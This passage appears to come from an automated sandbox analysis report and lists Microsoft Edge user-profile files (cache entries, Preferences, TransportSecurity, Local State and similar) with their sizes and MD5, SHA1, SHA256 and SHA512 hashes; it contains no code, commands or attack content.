                                                                                                                                                                                        d577a5b3a264829494f5520cc975f4c2044648d51438885f319c2c74a080ea5dd719b6a885ed4d3401fd7a32341f88f26da5e3f29214da9afbbbd5ee950e8ec3

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        69b70cdf7cdc0e6796ad43c0baa14798

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        5affa42b9afa371cd8abb7a3e63b7c9744b62482

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        89864447ace0dbd1f6b526afe0107293972d494652e56d2a1c37d74abb77d2b2

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        a4e5a38ff0eaa6d66932a828d66ec6f1495550b5bb15ca85fe34f280d987b7ad60a2b63b7179d13ea6f5f5ed58908cd8eace98dd89e50d6fd2049625f74d517b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5d13869316d6493923648f9b1377f972

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        066d80cf510805d919d4d8ba10ff7d318a0991d5

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        f1a496b2617689e932d720c03002cd8d4b95bafb644d816097a8ad4698baf931

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        4c51ddd06c21b62ee0e41f7d21a580aa1b43c247e646bf42234fb4a3d56f84a587216b23b5065ebbdc247ce28f1e8d04e0c57e997574e40ebc3bc1d08267db85

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        62KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        c3c0eb5e044497577bec91b5970f6d30

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d833f81cf21f68d43ba64a6c28892945adc317a6

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        67KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        9e3f75f0eac6a6d237054f7b98301754

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        80a6cb454163c3c11449e3988ad04d6ad6d2b432

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        33a84dec02c65acb6918a1ae82afa05664ee27ad2f07760e8b008636510fd5bf

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5cea53f27a4fdbd32355235c90ce3d9b39f550a1b070574cbc4ea892e9901ab0acace0f8eeb5814515ca6ff2970bc3cc0559a0c87075ac4bb3251bc8eaee6236

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        41KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        3358e831188c51a7d8c6be54efafc248

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        4b909f88f7b6d0a633824e354185748474a902a5

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c4cd0c2e26c152032764362954c276c86bd51e525a742d1f86b3e4f860f360ff

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        c96a6aae518d99be0c184c70be83a6a21fca3dab82f028567b224d7ac547c5ef40f0553d56f006b53168f9bba1637fdec8cf79175fd03c9c954a16c62a9c935e

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        63KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        710d7637cc7e21b62fd3efe6aba1fd27

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        8645d6b137064c7b38e10c736724e17787db6cf3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        19KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        2e86a72f4e82614cd4842950d2e0a716

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d7b4ee0c9af735d098bff474632fc2c0113e0b9c

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        88KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        b38fbbd0b5c8e8b4452b33d6f85df7dc

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        386ba241790252df01a6a028b3238de2f995a559

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.2MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        620dd00003f691e6bda9ff44e1fc313f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        aaf106bb2767308c1056dee17ab2e92b9374fb00

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        eea7813cba41e7062794087d5d4c820d7b30b699af3ec37cb545665940725586

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3e245851bfa901632ea796ddd5c64b86eda217ec5cd0587406f5c28328b5cb98c5d8089d868e409e40560c279332ba85dd8ce1159ae98e8588e35ed61da2f006

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        6df11e04317f8e22869a637b13a1eae7

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        e254761c6b7c4af3f2ab8433c50448c89e47e430

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c22849d8bf29d146d1362ae5b68d8393c0d80ea46d4a297da43b683b0599f478

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        d3dc6caf6f0f8b1415eafcb0b2d7b59597f7c3ca529b187e8d22c5bde2dba3e5802f292435d96c00b683a7d3e672a50066dba3b92464173be54bd2f78283b23c

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        16B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        46295cac801e5d4857d09837238a6394

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        265B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f5cd008cf465804d0e6f39a8d81f9a2d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6b2907356472ed4a719e5675cc08969f30adc855

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        265B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ee77ee0ddce6df6a4cf39b6d19ea6b4c

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d5407a3c365266b7a794e647bc17ed9e06b4389f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        79a078c39145a1dc1c27c15f05bb7a39bdaf7aec14fd85a2dcfd36b95a3f5b36

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1841689b05aab9ba73ac48bb390c148e92d218b07da6b89bbec900bcb84055fe2080115545933d495f6e8f2506497af930fbab1c68cf65ff080f2d5a61b30eeb

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        111B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        807419ca9a4734feaf8d8563a003b048

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        a723c7d60a65886ffa068711f1e900ccc85922a6

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        e82ae09daa2d2d781c95778a1d4fadb4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        5e951058951b177c9aa808ef46c72aa5490acdda

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        6e5df79d8782b75c3caa91a0d7ed32a831760bf639dc7bae36de2e69b88c4cf5

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5f2b2b680fa53fd74be2fc4dde8ea388b2948145d2cdccdd9e79da3c26345ab04f7c223f84e5a20b9d2c45cb633d86a120551d235aef31be2259a47857a3bc60

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        9KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        fade6cdbc7068468d9c5793a9521a354

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        731df58eb2d80619a8dc4356877b6343d5cbddbc

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b16f05ca3e134104d34763b7010e05c87424f3fbceb2e2f9e607541bc4e705ca

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f9ceed8f74bda77114b1851022b285de74ac7e10c9d58fb3136d68bca92e80c10d70bf9d3487a13f03176c4074fb41c523020986e685db08860b66e0a9046530

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        0d8ef381f7f7afb8b8ad4dc12b207b41

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c9dd04c7cf84e230688c3a5f0cce3d0da973d10d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8c282aa663d6f13df2370584eb92467de39a7f6db2b7f7aa84c1d3b125826309

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        23315778d70e8256000b5b9ca2424bf1a6ecb6b3b7c28369f1b1c3fe76cac7aebaae148a2ff9fc6c649d66dea4fb6a3cdb4a2238ece2920364e1c9ea5645c3a6

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        9KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        2f3166bfe85caa2cb2eadf2625c6c73c

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        11924dd564ce1da50f79eef6633240cfd9a1e923

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d3d0f4c06c987cc3182ef320a1ffab7dfc47b8c2c8a86800e1359d99558dfa41

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        4481f30a7ec03af059aac8bdfc5380e9a56d8d1d362e9609037eecdc723c61fbb81e5625d88123ee24b0200ce368348b6b2033e4f54f1981a6853002fc8b79a0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        9KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ea7cc9dfe4bf3e1836bdf4f056ea5007

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6fb1b5f35d160abb0b1489e89e13a8ef95db9c35

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        1c582bdc86e1c3d1f1eea544edd9ae229f8f5613616b4b251825c0e3c6b545ad

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        af41a459a3d8ba6605954de7aff211927eff36a235902084f7a79adedec9bb96897a72200463eb71e99b26e3902244a07b09f02e5fd4b67fcdf0df7a1220042e

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        8fe5786255604bfe701dc45cb9cd8b61

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d56d58cd745aa78d9ff9ff053b0914b82ade8e54

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        446c95a62a7e825ebf0f279ed45e2822fb35139371a0ec1282d4aa8cdbf6a86d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        654db1a85646ea650a6c44e8a0c19e47734d4b2012bd2683b8d579d9b17247dede04e88575249bc5d213cd21ead4a7894c8330c26c68cd8584e5bf5e623a8bd6

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ce1d1a57f13a50532c0582b3ff0f1b2f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        9f6b1a8d2f99a848713a46ac0e3e27e8b29a1c1c

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b7c0e5eb3094aa59182868052605ca1f8a95028ea3830229185c3effbf063eb6

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        a52832d04e3b70090fb32be980275fecf8d510db8e1fa752444484657404d46febd969f280c081af2bf64d40eee905672b22daa90dc6d90be727447f23367881

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        9KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a3d77da6938091820f1612ed5ad20fb1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d8a65299dcec05b08b611228747b6777a4cd7967

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        5939f09c95c93b3fa1b37e51cb6ec08d92b3c5c44fd0c9d47414e50613aec277

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8adb8c20d0114dab43961e4a2f94d69b8f4a8f74c0823fe8b0168189be8b64a26399042bd6144d5b59c0b34768efabdd097ad7bb18ac88098bedcd41354d0e12

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        3ec9a16ea38309fba2b3cbf4e94f7492

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        bb827229b225806ba1c7a6db929b2c91c2077d3a

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        753bb562045e4850e769662d79783d2fed70275f8e8a20048118f11a96cc8618

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0ce850d00ed2e314535f5331e0885a86107ee2f78091983a24498dc9f3ad8d4d06633c6242e6a697c236ba107356524979f40dd386507e061fe23956ed1be123

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        41B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        96B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        975ca78daa164a289acd9b5461e88719

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        5c9366774b62038dc6b002a8dd5d5f6321ee0c07

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        e22db1d7fef545db18070a2363872303245b29523a8208b8d9b7c0eea2d037bb

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        fbef50d6dcdadb7e0aa24765352856c5d468bf8e63591e934a03f4c051b3dee724cea5e07f2bdfe1046ad55419977dc2b1387814e66b71f3e326b639f414e85a

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5e0657.TMP

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        48B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        dcb9d092275982ce16401f80f5c98610

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        4c467b07c0be7444eb0a20d1dd4a72c5e6640f35

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        1e5d067020af8b37f82733e840edacd67b9bdd4e107ceca1169cf30248789c9f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        682435fe2a9ded81330f9b61852f60780623234cba981181340e5212c1d2244f0f8419f9a7b29673d280945bb356977e0d79a7360f5dd7e1785535c6809dc4e4

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5be71723f7d8c07e533cb9f91a47a9e8

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        796eef4bc74e7bf9660734c72e3319edb1cc0e92

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        5451db6712d7835339cf3c30494f10fc746039f5f45165964abd4426be631220

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1adf0416b48b3f7dd43393c6d3c2ae72891bb5eb2e9fdc3f50a2c4fccdce66f8f2197eb52fc18b9bb69a4ab77cab3285bed433ef411e494d87069c20bfed4645

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5ececec032f54261e3636f35f0aade21

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        066ab27735a3cfb7b01f9504a73b86f2554253fb

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        ab6823594a0f694c517e7d7336804191f3b632dfbdd77425ea6e33c53691001c

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        16c470d85036aa583ac3a9396b8e7167ceabfa4fc8249740e0207a92027616520f3c7759707c5e18a8b365801908f95d93d5628cd843052f9247228d52666c2c

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        abab0dcdbf660a7bf05767e0c23e49e9

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c99d2c76362639379ffcba55849eb7b765e19055

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        26e2d003c566ab3820a7b829170498dd26dba7aafb0c67de055e8c76c95d02c2

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f60ec72f490f4cbbedccfed3b836881bfa7220dd97b80d65615f2896287c58cd4271a0d8384d89ce29f91e889e0398a14f58caa19136e4702be58cfd6fb77a01

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        62672e0674222892fc12d6d292f51a5d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c4a67ee790b770301e284f63d4de569210d12d05

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d558cafa3c842cfa8731a93a0a6a4b8c65135b2d0a83ff9dcd23ed4c69a550c5

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8a2bb13c5cb1b0decf0ef5a6b0522243eeb7f3e6413f7d0617d588a38efed13d444ec3d483e27cf8e44aee85b0373b54a19d487581046130819056660e0e7a2b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        83f78be5cfe9a8a05a7730ebfd764a1c

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        69812a2543cb9856df401dd7e91710f8ae5ccb58

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        a8ad670e5704ccf8ec1c112605cc02fd29d74f331a5299c2528009fe70722cf2

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8e8fbfca3571b7cdfa79ae8217434c0efb2ce4dbd8b9f81542b2f04cae886b09e23f4d6957b72f8820608683da78f1a99426daf22fb595f9d69452b3f818d3b2

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        703B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        63f9c9ab52a1b70d5806323ca4b305f0

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        5b82afb08e880719bee3673464ad57715968237a

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b6b075ee04a15695bb94436d3ee7d5ab82512b7342142312bc3e0a0898940700

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9ff65d2469ecf730e15475be5825bfa2904766d22a86666cafded62132fdb102891e67bd79ca8ff77a4a4c23b5bd37147b3a420df5ff8332032587b3ff5c3b6b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f2e645842f5d93510852d28fdea121be

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        efec1834df2b552a9e3066b16c9b2e635802476b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        925576b14e234e5ca33f0c6b8ddc39d0c28fce032a9095e2e91e4e518042d213

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        fcc1ae2dcbfd142d028aab0c95f7ac44e8442e978754ee99fc8d8ff8155f24e7a002da090fb790e35dc4dc41be9aa4cc203179b04254bdd0e5a8b4ce96f8488d

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5d9bc6.TMP

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        203B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d9aee5722326f5317ae661ae77f707f8

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c7974777406fe769d35417a0f7131445dd87bd98

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        dd3708db24339feb8e90e413d03bea6fa2e58750adaf72b568098b4e66841c24

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        155fc6739cd094b3c5d07cb208aa9c8607af439def330dcea239eb304754a1af07de013a12033229160973cd3054d2ade5c565716a8c83872b721e83769b9540

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        16B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        16B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        aefd77f47fb84fae5ea194496b44c67a

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dcfbb6a5b8d05662c4858664f81693bb7f803b82

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        11KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        8df77bc4c56d8e68c466e4fcc9727612

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        a0fa7e01e45eeec779dd6dac7e72a8b7583a83af

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        ccbf1cb40c55a529c9a8dec5e70e4ac75497bc63ca78145b59b7b2676dceb9cd

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        236c4d95bdf1fb88b0d50df038d1005d294c3a9a2704682d9b957882734cfe1ec3b3f6d0067663d689624b64ead5f35144d7bf25695be4dc48c9db10227944a0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        12KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        cbe24aa80fb6623ed8bc70b56912cef3

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        40ad004edebd65d2dfa851fc219b702ec35b1032

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        fe7d83767d6b47187143483e3e32a9451dce1176cac82497c6ba9d7c7d14fb7d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        ff4d66f7f4306b9bbc707ff1d742dcbc23b82ee169baee720b1a3bb29adc9353b6bc96c94f2d8d5762682f2c1079b836462a598ee632d71b2c608302c7f58ac4

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        12KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        4d373a323724cec2539fd21aad6cf3f6

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        7ae87e6589f4dbe252640c3a4b89211e67c70988

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        64e7310b5e95a732bc2910b59e63b718ef3160ca487fc0034ee2c1d1b648ab3c

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        ab97181ac8efff7fd8179abc3c3b088810479af89361e9c7d68be28590bb8b1ee4d8712654d38cadd2b8559c1d414904789d1a76a9e8596077a987eaba86546a

